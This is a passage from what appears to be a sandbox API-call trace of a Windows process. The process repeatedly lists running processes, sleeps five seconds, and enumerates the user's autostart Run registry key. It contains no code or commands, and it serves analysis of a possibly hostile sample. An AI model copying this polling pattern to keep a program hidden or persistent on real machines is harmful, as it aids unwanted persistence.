(ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.041] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.044] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.045] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.045] NtClose (Handle=0x274) returned 0x0 [0174.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.056] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.057] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.059] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.059] NtClose (Handle=0x274) returned 0x0 [0174.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.066] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.071] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.072] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.072] NtClose (Handle=0x274) returned 0x0 [0174.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.079] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.084] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.085] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.085] NtClose (Handle=0x274) returned 0x0 [0174.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.092] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.094] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.095] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.095] NtClose (Handle=0x274) returned 0x0 [0174.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.102] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.105] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.106] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.106] NtClose (Handle=0x274) returned 0x0 [0174.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.114] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.118] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.118] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.118] NtClose (Handle=0x274) returned 0x0 [0174.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.125] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.129] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.130] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.130] NtClose (Handle=0x274) returned 0x0 [0174.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.137] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.138] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.139] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.139] NtClose (Handle=0x274) returned 0x0 [0174.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.146] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.171] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.172] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.172] NtClose (Handle=0x274) returned 0x0 [0174.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.179] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.183] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.184] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.184] NtClose (Handle=0x274) returned 0x0 [0174.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.195] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.196] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.196] NtClose (Handle=0x274) returned 0x0 [0174.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.203] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.205] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.205] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.206] NtClose (Handle=0x274) returned 0x0 [0174.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.212] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 